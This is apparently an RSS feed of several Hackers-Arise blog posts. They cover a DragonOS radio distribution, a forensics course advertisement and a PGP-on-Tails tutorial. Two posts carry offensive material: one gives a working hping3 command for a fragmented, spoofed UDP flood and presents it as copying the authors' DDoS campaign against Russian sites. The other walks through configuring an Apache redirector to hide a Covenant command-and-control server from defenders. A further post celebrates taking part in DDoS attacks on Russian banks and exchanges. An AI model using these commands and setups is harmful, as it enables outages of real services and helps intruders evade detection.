<figure><img src="https://static.wixstatic.com/media/6a4a49_12abbff615cf42b6b2971e586ee03238~mv2.png/v1/fit/w_543,h_654,al_c,q_80/file.png"></figure>
 
 
<h2>Summary</h2>
 
DragonOS is the ideal operating system for working Software Defined Radio! It's built upon Lubuntu giving us all the capabilities of a well-known Linux distribition with hundreds of tools built-in with all their dependencies. This makes SDR Hacking so much easier.
 
For more tutorials on SDR for Hackers, <a href="https://www.hackers-arise.com/sdr-for-hackers" rel="noreferrer" target="_blank">click here.</a>
 
We will be using this Linux distribution throughout all of SDR Hacking courses including;
 
<ol>
<li>SDR for Hackers</li>
<li>Advanced SDR for Hackers</li>
<li>Satellite Hacking</li>
<li>Car Hacking and more!</li>
</ol>]]></content:encoded></item><item><title><![CDATA[DDoS Attacks: Flooding Russian Sites with Fragmented UDP Packets]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! At the beginning of the cyberwar between Russia and Ukraine, Hackers-Arise, the IT Army of...]]></description><link>https://www.hackers-arise.com/post/ddos-attacks-flooding-russian-sites-with-fragmented-udp-packets</link><guid isPermaLink="false">655286393b6bb49a8f28da4f</guid><pubDate>Mon, 27 Nov 2023 22:05:51 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_78d8513669bf439788e127d9dc17959d~mv2.png/v1/fit/w_718,h_152,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
 
At the beginning of the cyberwar between Russia and Ukraine, Hackers-Arise, the IT Army of Ukraine and over 17,000 hackers around the world (this is the Russian estimate. we believe it is much higher)set out to make Russia's digital assets unavailable. In this way, the Russians would not be able communicate via their websites, operate their military, or run their commercial operations. We targeted the following websites below within Russia. This is an example of the classic Distributed Denial of Service (DDoS) attacks.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_fa7e8e0768c041a781aadb02fdd0f17e~mv2.png/v1/fit/w_589,h_889,al_c,q_80/file.png"></figure>
 
 
One of things we did a little differently was to use UDP packets rather than TCP packets. UDP attacks can be much more effective for DDoS, as we will see. According to DDoS protection companies such as Radware and Akamai, this was the most common type of DDoS attack in 2023 accounting for nearly 2/3 of all attacks.
 
A UDP flood attack is a type of Distributed Denial of Service (DDoS) attack where the attacker overwhelms a target server with User Datagram Protocol (UDP) packets. The aim is to either consume network resources to the point where the target can no longer handle legitimate traffic or to exploit vulnerabilities in the UDP protocol to cause the server to respond with even more traffic, amplifying the attack. 
 
Here's a bit more detail about how it works and its impact:
 
<h2>Understanding UDP</h2>
<ol>
<li>UDP Characteristics: UDP is a connectionless protocol, which means it doesn't require a handshake to set up a connection before data is sent. This makes UDP faster than TCP (Transmission Control Protocol), but less reliable in terms of ensuring data integrity and delivery.</li>
<li>No Connection Verification: Because there's no connection verification in UDP, an attacker can send packets to random ports on a target server with a spoofed IP address (the source IP address is faked).</li>
</ol>
<h2>Mechanism of UDP Flood Attack</h2>
<ol>
<li>High Volume of Requests: The attacker sends a large number of UDP packets to random ports on the target server.</li>
<li>Server Responses: For each packet, the server checks for an application listening at that port. When no application is found, the server responds with a 'Destination Unreachable' packet.</li>
<li>Network Saturation: This flood of incoming UDP packets and outgoing 'Destination Unreachable' responses can saturate the network bandwidth and resources of the server, making it incapable of processing legitimate requests.</li>
<li>Amplification: Some UDP flood attacks use amplification techniques, where the attacker sends a packet to a third-party server (like a DNS server), forging the sender's IP address to that of the victim. The third-party server then sends a large response to the victim, amplifying the amount of data directed at the target.</li>
</ol>
In addition, in UDP flood attacks the packets can be fragmented or otherwise malformed resulting in an even faster packets-per-second rate and cause some network cards to fail.
 
We can duplicate this attack with our trusty Kali and the tool known as the "packet-crafting" tool for its versatility, hping3.
 
 
<h2>Step #1: How hping3 works</h2>
 
hping3 is a tremendous and simple tool for network and port scanning. One of its beauties is its ability to create just about any type of packet. Most technologies that interact with the internet create standard packets that are compliant with the RFC's that govern the Internet. As hackers, we are not limited by those RFC's.
 
hping3's ability to create just about any type of packets can be especially useful in crafting an attack to get past security devices such as IDS's and firewall. It can also be an excellent DDoS too.
 
Let's begin by looking at the help screen for hping3.
 
kali > hping3 -h
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9877002905e74b96bd3d77954ac2f733~mv2.png/v1/fit/w_617,h_524,al_c,q_80/file.png"></figure>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_3b4c9efe352041d7a84af7750bb0f204~mv2.png/v1/fit/w_616,h_621,al_c,q_80/file.png"></figure>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_101a91af45b04df990ffa21bfe83a423~mv2.png/v1/fit/w_627,h_313,al_c,q_80/file.png"></figure>
 
<h2>Step #2: Standard Port Scan</h2>
 
Let's begin by doing a standard port scan with hping3. Like nmap, hping3 is able to determine whether a port is open on the target server but the results are a little more difficult to interpret.
 
We can do a port scan with hping3 by simply using the -S option and IP address of the target such as;
 
kali > sudo hping3 -S 192.168.107.150
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_48da586cbf2f4dc3a274e8c1df231a35~mv2.png/v1/fit/w_1000,h_388,al_c,q_80/file.png"></figure>
 
Notice that hping3, without any other options simple scan port 0 (sport=0) and the target response is flags=RA. When the packet responds with the R (reset) flag, that means the port is closed.
 
To scan a particular port with hping3, you can append the scan command with a -p and the port number such as -p 80.
 
kali > sudo hping3 -S 192.168.107.150 -p 80
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_1d70822ef42c4d05b0d7cbec875e32a2~mv2.png/v1/fit/w_1000,h_337,al_c,q_80/file.png"></figure>
 
 
 
<h2>Step #3: UDP Flood with fragmented packet s and spoofed IP address</h2>
 
Now, to use hping3 as an effective DDoS tool, we need to send a flood of fragmented UDP packets from a spoofed IP address. We do this with the following command;
 
kali> sudo hping3 -S --udp --flood -f --spoof 192.168.107.101 192.168.107.152
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_78d8513669bf439788e127d9dc17959d~mv2.png/v1/fit/w_718,h_152,al_c,q_80/file.png"></figure>
 
 
Where:
 
hping3 is the command
 
-S option means scan
 
--udp means send UDP packets
 
-f option means fragment the packets
 
--spoof means use the following IP address as the sender IP
 
 
<h2>Summary</h2>
 
Despite years of technological security advances in DDoS protection, a simple tool such as hping3 with a little savvy and knowledge can still have devastating effects on the availability of websites and services. When a tool like hping3 is delivered to thousands are even millions of IoT devices and targeted to one IP address, there is little that can done to stop it's devastating effects.
 
]]></content:encoded></item><item><title><![CDATA[Hackers-Arise Announces a New Training Program: Digital Forensics and Incident Response (DFIR)!]]></title><description><![CDATA[Many of our aspiring cyberwarriors have been asking for a separate digital forensics and incident response (DFIR) training program and we...]]></description><link>https://www.hackers-arise.com/post/hackers-arise-announces-a-new-training-program-digital-forensics-and-incident-response-dfir</link><guid isPermaLink="false">654e92f04a3befe2a0645b02</guid><pubDate>Fri, 10 Nov 2023 20:46:17 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_ae7b90a8fde348f5a26f405f9110af2b~mv2.png/v1/fit/w_1000,h_679,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Many of our aspiring cyberwarriors have been asking for a separate digital forensics and incident response (DFIR) training program and we have responded!
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ae7b90a8fde348f5a26f405f9110af2b~mv2.png/v1/fit/w_1000,h_679,al_c,q_80/file.png"></figure>
 
 
This new program will use many of the existing courses on our Subscriber and Subscriber Pro platform and add additional, new courses specifically for digital forensics and incident response. We recognize that not everyone in cybersecurity wants to become a hacker/penetration tester and many of you will choose a career in protecting an institution's resources. This career has excellent job security (hacks will not stop any time soon) and excellent pay and benefits.
 
Between now and the beginning 2024, you can now join this 3 year program at an introductory price $1500 until March 1 ($2000 after)!
 
This program will contain the following courses;
 
<ol>
<li>Digital Forensics</li>
<li>Advanced Digital Forensics</li>
<li>OSINT</li>
<li>Bitcoin Forensics</li>
<li>Cyber Law</li>
<li>Criminal Law</li>
<li>Incident Response</li>
<li>Threat Intelligence</li>
<li>Cloud Security and Incident Response</li>
<li> Anti-Forensics</li>
<li> Network Forensics</li>
<li> Memory Forensics</li>
<li> SCADA/ICS Forensics</li>
<li> Snort</li>
<li> Splunk</li>
<li>Reverse Engineering Malware</li>
</ol>
 
For more information, <a href="https://www.hackers-arise.com/post/hackers-arise-announces-a-new-training-program-digital-forensics-and-incident-response-dfir" target="_blank">https://www.hackers-arise.com/post/hackers-arise-announces-a-new-training-program-digital-forensics-and-incident-response-dfir</a> or email hackers-arise@protonmail.com.]]></content:encoded></item><item><title><![CDATA[Getting Started with PGP for email]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! Pretty Good Privacy or PGP has been around for over 30 years and has proven that it is pretty...]]></description><link>https://www.hackers-arise.com/post/getting-started-with-pgp-for-email</link><guid isPermaLink="false">654be53c371c43c4071903bb</guid><pubDate>Fri, 10 Nov 2023 15:40:00 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_551d40bf7ea54621ab5c2e7b271c910e~mv2.png/v1/fit/w_250,h_250,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
 
Pretty Good Privacy or PGP has been around for over 30 years and has proven that it is pretty good! PGP is used in many different environments but most widely in email.
 
The most common use for PGP is to enable people to confidentially send messages and data to each other using a combination of their public and private keys (PKI). It is often used to encrypt and decrypt emails, files, text messages, and entire disk partitions, and to authenticate digital certificates. 

PGP can also used to authenticate messages and check for integrity. It can detect whether a message has been altered after it was written and whether it was sent by the person who claims to have sent it. PGP creates a digital signature for private and public keys to prove that a sender is the rightful owner of the message.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_551d40bf7ea54621ab5c2e7b271c910e~mv2.png/v1/fit/w_250,h_250,al_c,q_80/file.png"></figure>
 

PGP can also be used to confirm that a message reaches the intended recipient. A user’s public key can be distributed in an identity certificate, which is constructed to ensure that tampering is easily detected. PGP products can also confirm whether a certificate belongs to someone, also known as the web of trust concept.
 
In this tutorial, Aircorridor will show you how to use OpenPGP in a Tails OS environment to keep your emails pretty private.
 
<h2>What is OpenPGP?</h2>
<h2></h2>
OpenPGP (also known as <a href="https://www.openpgp.org/about/" target="_blank">Open-Source PGP</a>) was created by one of the PGP’s inventors, Phil Zimmerman, to overcome the patent restrictions that were preventing PGP's wide use. First developed as freeware in 1991, PGP encryption later became proprietary software and is now owned by Symantec. 
 
One of the interesting developments in the history of PGP was the NSA challenge to PGP. Soon after Zimmerman released PGP, the NSA demanded a backdoor. To his credit, Zimmerman refused (the NSA asks for backdoors to all encryption schemes and believes they are entitled to them). The case went all the way to the U.S. Supreme Court before the NSA dropped the case. Many have speculated on why they dropped case after many years, but people believe one or the other motivated them;
 
<ol>
<li>The NSA developed their own backdoor and no longer needed Zimmerman to grant them one</li>
<li>The NSA feared they would lose the case and would no longer be automatically granted backdoors to all encryption schemes.</li>
</ol>
 
Zimmermann shared the message format for PGP with the wider community. Based on this, the OpenPGP standard was created in 1997, enabling anyone to write implementations that are compatible with other software that uses OpenPGP.
<h2></h2>
<h2>How does PGP work?</h2>
<h2></h2>
PGP combines data compression, password hashing, symmetric-key cryptography, and public-key cryptography to keep sensitive data secure. Let's imagine a scenario where John wants to send a private message to his friend Dave. PGP generates a public key and a private key for Dave, known as a key pair. These public and private keys are strings of bytes representing numbers that are mathematically related.
 
Dave can share his public key with anyone he wants. This key is like a lock that can only be opened with his private key. So, anyone can use his public key to send secret messages, but only Dave can unlock and read them with his private key.
 
 
So when John writes to Dave: 
 
1. John uses Dave’s public key to encrypt his message into ciphertext – seemingly random characters that can’t be read.
 
2. John sends the message. Anyone who tries to read it in transit, like email providers, spies, or hackers, will only see unreadable ciphertext.
 
3. Dave receives the message and uses his private key to decrypt the message into readable plaintext.
 
4. To reply, Dave repeats the process using John’s public key. Only John can read it by decrypting it with his private key.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d28e47aff9844f35826ad32df7c8c59b~mv2.png/v1/fit/w_675,h_550,al_c,q_80/file.png"></figure>
 
 

<h2>How to use PGP on Tails OS</h2>
<h2></h2>
Step #1: Create a Pair of Keys
 
To receive messages, you have to create a pair of Public/Private keys. To do so, open Kleopatra from the application menu.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_fb53b656b23546abb1e6462b18b195a5~mv2.png/v1/fit/w_499,h_433,al_c,q_80/file.png"></figure>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5a5016e9532a4bdabfe4d50641d64c73~mv2.png/v1/fit/w_1000,h_526,al_c,q_80/file.png"></figure>
 

Switch to the “Create a personal OpenPGP key pair”. 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_7048a1d76c574334ae442f10d34a0d0c~mv2.png/v1/fit/w_497,h_392,al_c,q_80/file.png"></figure>
 


You can choose any name and email address. To change key strength and other settings click “Advanced Settings”.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_7e8640a6ebf5413bac31522ec4d577a1~mv2.png/v1/fit/w_494,h_388,al_c,q_80/file.png"></figure>
As you can see below, you can designate various encryption schemes or varying strength.
<figure><img src="https://static.wixstatic.com/media/6a4a49_9455098bb68043498e26b717a71c6fa3~mv2.png/v1/fit/w_368,h_569,al_c,q_80/file.png"></figure>
 
 
Next, choose who would sign this cipher and for whom to encrypt it and click “Sign/Encrypt Notepad”.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d8b780ab04644d519ee6bce09d01acf2~mv2.png/v1/fit/w_493,h_441,al_c,q_80/file.png"></figure>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ca9915e83bb3462699d9460486757602~mv2.png/v1/fit/w_1000,h_842,al_c,q_80/file.png"></figure>
 
<h2>Step #2: Message a Friend</h2>
 
Get your friend’s public key, including the lines where it says "BEGIN PGP PUBLIC KEY BLOCK" and "END PGP PUBLIC KEY BLOCK" and save it with extension .asc.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_a6f311a1d5e646f8857d8aff179fa2eb~mv2.png/v1/fit/w_894,h_747,al_c,q_80/file.png"></figure>
 
Then import the file to Kleopatra.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f080305eb5b74da6a815673c501c3513~mv2.png/v1/fit/w_467,h_507,al_c,q_80/file.png"></figure>
 
Click in Kleopatra on Notepad and write a message.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_c0b323917938440a8359534ae4317457~mv2.png/v1/fit/w_1000,h_374,al_c,q_80/file.png"></figure>
 
Choose who would sign this cipher and for whom to encrypt it and click “Sign/Encrypt Notepad”
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ff602f7189ae4753bd33964dd7866be5~mv2.png/v1/fit/w_1000,h_482,al_c,q_80/file.png"></figure>
 
 
To give someone else your public key, just right-click on the certificates and use “Export” to export the public key and “Export Secret Keys” to the export private key.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_283bfbfffda24bf892d077d4b3f2c987~mv2.png/v1/fit/w_1000,h_559,al_c,q_80/file.png"></figure>
 
 
When the recipient receives it, they need to enter a passphrase to decrypt the cipher (of course if they have the private key).
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_77f67208eb2a4b929cbaef62621e835c~mv2.png/v1/fit/w_1000,h_505,al_c,q_80/file.png"></figure>
 
 
<h2> Summary</h2>
 
This article explores the use of Pretty Good Privacy (PGP) encryption in Tails OS. PGP is a powerful tool for securing your digital communications and data. It can help you protect your data, communications, and online identities, making it an indispensable tool for those seeking heightened security in an era of increasing digital threats and privacy concerns.]]></content:encoded></item><item><title><![CDATA[Command & Control Series Part III (Installing your Redirector)]]></title><description><![CDATA[In the dynamic landscape of cybersecurity operations, the use of Command and Control (C2) servers stands as a critical component for...]]></description><link>https://www.hackers-arise.com/post/command-control-series-part-iii-installing-your-redirector</link><guid isPermaLink="false">654406c5a6c3b91cc361efde</guid><pubDate>Wed, 08 Nov 2023 16:09:45 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
<figure><img src="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png"></figure>
 
 
In the dynamic landscape of cybersecurity operations, the use of Command and Control (C2) servers stands as a critical component for orchestrating coordinated tasks across compromised systems. However, directly interacting with a C2 can often leave an operator exposed to detection and countermeasures. This is where the strategic implementation of a redirector plays a pivotal role. 
 
A redirector acts as an intermediary, designed to conceal the true endpoint of a C2 by channeling the communication through seemingly benign relay points. By using a redirector, threat actors can obfuscate their traffic, thereby complicating the defensive efforts to trace malicious activities back to the source. 
 
The redirector not only masks the C2 traffic to evade network defenses but also adds a layer of resilience, ensuring that the core infrastructure remains hidden and operative despite adversarial disruptions. In this post, we'll delve into how a redirector can be set up using Apache2, an adaptable and robust platform that provides the necessary features to construct a deceptive front, safeguarding your C2 behind a veil of regular internet noise. In this article, we are going to install our own Redirector to interact with our C2.
 
In this case, I'm using Ubuntu but it works for other Linux distributions as well. Go to your terminal and execute the following commands:
<ol>
<li>sudo a2enmod rewrite proxy proxy_http proxy_connect
</li>
</ol>
<figure><img src="https://static.wixstatic.com/media/6a4a49_290871f8fc954dd7b170ea8b5d85d43f~mv2.png/v1/fit/w_1000,h_266,al_c,q_80/file.png"></figure>
 
This line runs multiple a2enmod commands, which are scripts specific to Apache on Debian-based systems for enabling modules within Apache’s configuration. But let me explain to you what is this command.
<ul>
<li>rewrite: This is a module that allows for the rewriting of URLs according to specified rules. This capability is particularly useful for conditionally redirecting traffic. In the context of a C2 redirector, you might use rewrite rules to only redirect traffic that meets certain criteria, effectively making your C2 communications less conspicuous.</li>
<li>proxy: This module provides basic support for running Apache as either a reverse proxy or a forward proxy. A reverse proxy takes requests from the internet and forwards them to servers in an internal network. In C2 operations, a reverse proxy can forward traffic to a hidden C2 server, while the proxy itself can be configured to minimize suspicious patterns in traffic that might be detected by defensive measures.</li>
<li>proxy_http: This module extends Apache’s proxying capabilities over HTTP and HTTPS. For a C2 redirector, it’s vital because it allows the forwarding of client requests to the actual C2 server over these common web protocols.</li>
<li>proxy_connect: This module enables the use of the CONNECT method, typically used for tunneling through a proxy server. This method is important for setting up SSL connections through the proxy, which can be a necessary part of securely managing C2 communications without revealing the traffic content to intermediate network security appliances.</li>
</ul>
 
2. sudo a2ensite 000-default.conf
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_e581a88fbe9244a4b349d00a47e57f83~mv2.png/v1/fit/w_928,h_35,al_c,q_80/file.png"></figure>

a2ensite: is yet another script that enables a site within Apache. 000-default.conf is the default virtual host configuration file in Apache. When this command is executed, it creates a symbolic link for this configuration file from the sites-available directory (/etc/apache2/sites-available/) to the sites-enabled directory (/etc/apache2/sites-enabled/), which tells Apache to load this configuration on startup.
 
3. sudo sudo service apache2 restart
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_764eee454de34f25a53affd32ab7e467~mv2.png/v1/fit/w_901,h_27,al_c,q_80/file.png"></figure>
 
4. sudo vim /etc/apache2/sites-enabled/000-default.conf

<figure><img src="https://static.wixstatic.com/media/6a4a49_567c15c42f8241f999d6ec81b05dc155~mv2.png/v1/fit/w_1000,h_42,al_c,q_80/file.png"></figure>
 
This command opens the 000-default.conf file in vim, which is a highly configurable text editor. It allows you to modify the configuration of the default virtual host for the Apache server.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9a378d3445c2428da5833823797644de~mv2.png/v1/fit/w_1000,h_506,al_c,q_80/file.png"></figure>
 
Inside you will write the following lines:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_72c0d66c99724ce593b8fb7888180f73~mv2.png/v1/fit/w_1000,h_622,al_c,q_80/file.png"></figure>
 
 
ProxyRequests Off: This directive disables forward (standard) proxy requests, meaning that the server will not proxy arbitrary requests from clients. This is typically set to 'Off' for a reverse proxy, which is what you're configuring here. A reverse proxy is intended to proxy requests to predefined destinations (in this case, the C2 server), rather than acting as a general-purpose proxy server.
 
ProxyPass /en-us/index.html http://xxx.xxx.xxx.xxx/en-us/index.html: This line sets up a proxy pass rule. When the Apache server receives a request for /en-us/index.html, it will forward this request to http://xxx.xxx.xxx.xxx/en-us/index.html, where xxx.xxx.xxx.xxx is the IP address of your Covenant C2 server. This means that anyone who navigates to /en-us/index.html on the Apache server will be served the content from the Covenant server instead, without direct exposure of the C2 server's IP address.
 
ProxyPassReverse /en-us/index.html http://xxx.xxx.xxx.xxx/en-us/index.html: The ProxyPassReverse directive is used in conjunction with ProxyPass and is crucial for handling HTTP headers of responses coming from the C2 server. When responses are sent back to the client, this directive rewrites any headers referring to the C2 server's internal IP address so that they point to the proxy server's address instead. This ensures that the client's experience remains seamless and that the actual location of the C2 server remains hidden.
 
ProxyPass /en-us/docs.html http://xxx.xxx.xxx.xxx/en-us/docs.html and ProxyPassReverse /en-us/docs.html http://xxx.xxx.xxx.xxx/en-us/docs.html: These directives are similar to the previous ProxyPass and ProxyPassReverse directives but apply to the /en-us/docs.html path. Each pair is responsible for proxying a different path on the server, allowing you to have multiple proxied pages, each possibly serving a different function or hosting different content relevant to the operation of the C2 server.
 
ProxyPass /en-us/test.html http://xxx.xxx.xxx.xxx/en-us/test.html and ProxyPassReverse /en-us/test.html http://xxx.xxx.xxx.xxx/en-us/test.html: Again, these directives serve the same purpose as the earlier ProxyPass and ProxyPassReverse pairs but are applied to the /en-us/test.html path. They direct traffic destined for that path to the corresponding path on the C2 server.
 
These configurations essentially turn your Apache server into a specialized reverse proxy for your Covenant C2 server, with the goal of obfuscating the origin of the C2 communications. It is designed to make the traffic appear as if it is directed to and coming from the proxy server, thereby helping to mask the presence and location of the actual C2 server.
 
That is it, you are ready to operate. Next time I will show you how to use your Covenant C2 Server with this Redirector. 
 
Also, make sure you check:
<h2><a href="https://www.hackers-arise.com/post/command-control-series-part-i-installing-your-own-c2-server-on-kali-linux" target="_blank">Command & Control Series Part I (Installing your own C2 Server on Kali Linux)</a> </h2>
<h2><a href="https://www.hackers-arise.com/post/command-control-series-part-ii-operating-your-own-c2-server" target="_blank">Command & Control Series Part II (Operating your own C2 Server)</a> </h2>
 
Smouk out!
 

If you liked what you saw, you might be interested in our Hacking Infrastructure course, or perhaps you'd like to consider becoming part of our community by becoming a<a href="www.hackers-arise.com/subscriber-pro" target="_blank"> </a><a href="www.hackers-arise.com/subscriber-pro" target="_blank">Subscriber PRO.</a>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
]]></content:encoded></item><item><title><![CDATA[The Return of the Devastating DDoS Attacks or The Revenge of the IoT]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! As you well know, the Distributed Denial of Service (DDoS) attack is one of simplest attacks. It...]]></description><link>https://www.hackers-arise.com/post/the-return-of-devastating-ddos-attacks-the-revenge-of-the-iot</link><guid isPermaLink="false">654953fbf020b109c1b3f133</guid><pubDate>Tue, 07 Nov 2023 21:34:28 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_5d2a867dbb7b4605a7dddabe83f2ae18~mv2.gif/v1/fit/w_800,h_490,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
 
Welcome back, my aspiring cyberwarriors!
 
As you well know, the Distributed Denial of Service (DDoS) attack is one of simplest attacks. It is simply brute-force packet jamming a network to render it useless or nearly useless. When its done with just a few nodes it can be easily thwarted by a number techniques such as load balancing, black hole routing, rate limiting and many newer intelligent systems techniques. The impact is minimal. 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5d2a867dbb7b4605a7dddabe83f2ae18~mv2.gif/v1/fit/w_800,h_490,al_c,q_80/file.png"></figure>
 
 
 
<h2>Massive Numbers of Compromised IoT Devices </h2>
 
When it done with a massive number of nodes, nearly everything is vulnerable. Millions of IoT devices have been compromised due to VERY lax security for these devices. Any IoT device such cameras, security systems, and baby monitors can become an attack vector used to create a massive attack that would crush any network. Nothing would be safe. This is a vastly overlooked issue in our time of IoT devices. We may be ready to pay a heavy price for such oversight. This keeps me awake at night and I think it should keep you awake too!
 
<h2>New DDoS Techniques</h2>
 
 In addition, new techniques have made DDoS even more deadly. Distributed Denial of Service (DDoS) attacks have become increasingly sophisticated, with attackers continually developing new techniques to circumvent traditional defense mechanisms. Some of the latest DDoS attack techniques and trends include:
 
<ol>
<li>Multi-Vector Attacks: Modern DDoS attacks often combine several attack vectors at once, making them more difficult to defend against. Attackers may simultaneously use volumetric attacks, protocol attacks, and application layer attacks to overwhelm systems in different ways.</li>
<li>Amplification Techniques: Attackers continue to use amplification to increase the volume of their attacks. They exploit the communication protocols that respond with more data than they receive (like DNS, NTP, SSDP, CLDAP, and memcached) to send small queries that provoke much larger responses to the targeted system.</li>
<li>Burst Attacks: These are short-duration attacks that come in quick bursts, intended to disrupt service without triggering DDoS mitigation which often requires a sustained attack before it activates. Burst attacks can be particularly damaging for services that require high availability.</li>
<li>IoT Botnets: Insecure Internet of Things (IoT) devices are increasingly being co-opted into botnets. These botnets are used to mount large-scale DDoS attacks, as seen with the Mirai botnet and its variants. Because there are so many IoT devices with poor security, they provide a vast attack surface for malicious actors.</li>
<li>AI and Machine Learning: Some attackers are beginning to use AI and machine learning to automate the process of finding and exploiting vulnerabilities, as well as to adapt in real-time to defensive measures, making their attacks more effective and persistent.</li>
<li>SSL/TLS Exploits: Attacks are increasingly targeting the encrypted traffic of SSL/TLS protocols. These attacks require more processing power to mitigate because the defensive systems must decrypt the incoming data to inspect it, which can be resource-intensive.</li>
<li>Direct Path Attacks: These attacks bypass common DDoS protection by targeting the IP address of individual network interfaces. This is particularly a risk for cloud services, where the IP address can be exposed through various methods.</li>
<li>Ransom DDoS (RDoS): Here, attackers threaten to launch a DDoS attack or start a small-scale attack unless a ransom is paid. The fear of a potential large-scale DDoS can pressure organizations into paying.</li>
<li>Supply Chain and Dependency Attacks: Attackers target less-secure elements of an organization's supply chain, including third-party services and APIs, understanding that disrupting these can have knock-on effects on the primary target.</li>
<li>State-Sponsored Attacks: Some of the most sophisticated DDoS attacks are suspected to be carried out by state-sponsored actors, often as part of broader cyberwarfare strategies. These attacks may target critical infrastructure or be used as a distraction for other types of cyber intrusions.</li>
</ol>
 
<h2>The Greatest DDoS Attacks in History</h2>
 
To better understand the incredible weight that a massive DDoS attack might have, let's consider the greatest DDoS attacks in history.
 
BBC – December 2015
 
The BBC's entire domain, including its website and iPlayer service, was brought down by an attack that was believed to be around 600 Gbps.
 
Krebs on Security – September 2016 
 
Security journalist Brian Krebs' website was hit by a DDoS attack that peaked at 620 Gbps. It was later found that this attack was also carried out by the Mirai botnet.
 
Spamhaus – March 2013: 
 
Spamhaus, a non-profit organization that fights spam, was targeted by an attack that reached 300 Gbps. The attackers used a DNS reflection technique, which was, at the time, one of the largest-known DDoS attacks.
 
GitHub – February 2018: 
 
GitHub was hit by a DDoS attack that peaked at 1.35 Tbps. This attack was notable because it was powered by an amplification attack exploiting memcached servers, which returned large volumes of data to the targeted IP address in response to small queries.
 
Dyn – October 2016
 
A major attack targeted the DNS provider Dyn and peaked at an estimated 1.2 Tbps. This attack caused major internet platforms and services to be unavailable to large swathes of users in Europe and North America. The attack was attributed to a large network of IoT devices (such as cameras and home routers) that had been hijacked by the Mirai botnet.
 
Google – September 2017: 
 
Google revealed that in 2017 it had defended against a DDoS attack that peaked at 2.54 Tbps, which at the time of the revelation made it the largest DDoS attack in history, surpassing the attack against AWS.
 
Amazon Web Services (AWS) – February 2020: 
 
AWS reported a DDoS attack that peaked at 2.3 terabits per second (Tbps), the largest ever reported at the time. The attack was a Connection-less Lightweight Directory Access Protocol (CLDAP) reflection-based attack, a type of attack that exploits a vulnerability in CLDAP servers to amplify the amount of data sent to the victim's network.
 
<h2>The Cyberwar DDoS Attack Against Russia February-March 2022</h2>
 
Although no one knows for certain the precise number of packets directed at Russia at the outset of the war, Russia stated that this was the largest DDoS attack in their history.
 
Read what Bleeping Computer reported on the attack below.
 
<a href="https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/" target="_blank">https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/</a> 
 
The most powerful of these DDoS attacks was recorded by Rostelecom--the Russian Telecom giant--was 760 GB/sec, almost twice as big as the most potent attack of the previous year, while also the longest, lasting nearly three months.
 
We, at Hackers-Arise, the IT Army of Ukraine and hackers across the planet participated in the largest DDoS attack in history. For nearly three months, we crushed Russia's major institutions such as SberBank, the Moscow Stock Exchange, the distribution of alcoholic beverages throughout Russia (heaven forbid! A Russia without vodka!) and many other major institutions.
 
Russia estimates that 17,000 IP addresses attacked them and they have vowed to exact revenge on all 17,000 of us. Imagine what would have happened if someone had used millions of IoT devices?
 
 
<h2>Summary</h2>
 
These figures for each of these attacks represent the peak sizes as reported, but it's worth noting that the actual impact of a DDoS attack is not solely determined by its size. The sophistication of the attack, the defenses in place, and the duration of the attack are all critical factors that influence the overall effect.
 
I believe we are on the cusp of massive DDoS attacks from IoT devices that will cripple major institutions around the globe.
 
